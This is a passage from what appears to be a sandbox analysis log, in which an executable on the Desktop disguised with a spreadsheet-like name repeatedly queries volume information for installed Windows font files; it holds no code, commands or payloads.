          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
